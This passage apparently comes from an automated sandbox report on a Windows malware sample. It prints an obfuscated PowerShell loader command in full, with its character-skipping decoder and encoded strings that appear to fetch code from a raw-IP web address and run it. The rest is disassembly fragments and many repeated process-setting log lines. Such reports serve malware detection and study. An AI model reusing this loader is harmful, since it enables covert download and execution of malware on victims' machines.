';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,20_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACD86DCA push eax; iretd 2_2_00007FFAACD86DCD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACD85479 push ebp; iretd 2_2_00007FFAACD85538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0300EC78 pushfd ; retf 14_2_0300EC79
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07751FB2 push eax; mov dword ptr [esp], ecx14_2_077521B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923F155 push eax; iretd 14_2_0923F15E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_09235D96 push edx; ret 14_2_09235D9D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923B9E0 push edx; ret 14_2_0923B9E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_09240862 push ebp; ret 14_2_09240834
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_09240709 push 8FC93C6Fh; iretd 14_2_0924070E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923AF63 push cs; retf 14_2_0923AFD6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923C3A7 pushad ; iretd 14_2_0923C3B2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923AFB5 push ss; retf 14_2_0923AFC2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923039E push eax; iretd 14_2_0923039F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_092407E2 push ebp; ret 14_2_09240834
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923AFC4 push cs; retf 14_2_0923AFD6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923E2DC push ds; iretd 14_2_0923E2DD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24572806 push ecx; ret 17_2_24572819
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24581219 push esp; iretd 17_2_2458121A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044F0862 push ebp; ret 17_2_044F0834
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EF155 push eax; iretd 17_2_044EF15E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EB9E0 push edx; ret 17_2_044EB9E8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044E5D96 push edx; ret 17_2_044E5D9D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EE2DC push ds; iretd 17_2_044EE2DD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EAF63 push cs; retf 17_2_044EAFD6
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044F0709 push 8FC93C6Fh; iretd 17_2_044F070E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EAFC4 push cs; retf 17_2_044EAFD6
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044F07E2 push ebp; ret 17_2_044F0834
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044E039E push eax; iretd 17_2_044E039F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EC3A7 pushad ; iretd 17_2_044EC3B2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EAFB5 push ss; retf 17_2_044EAFC2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044693D push ecx; ret 20_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,23_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
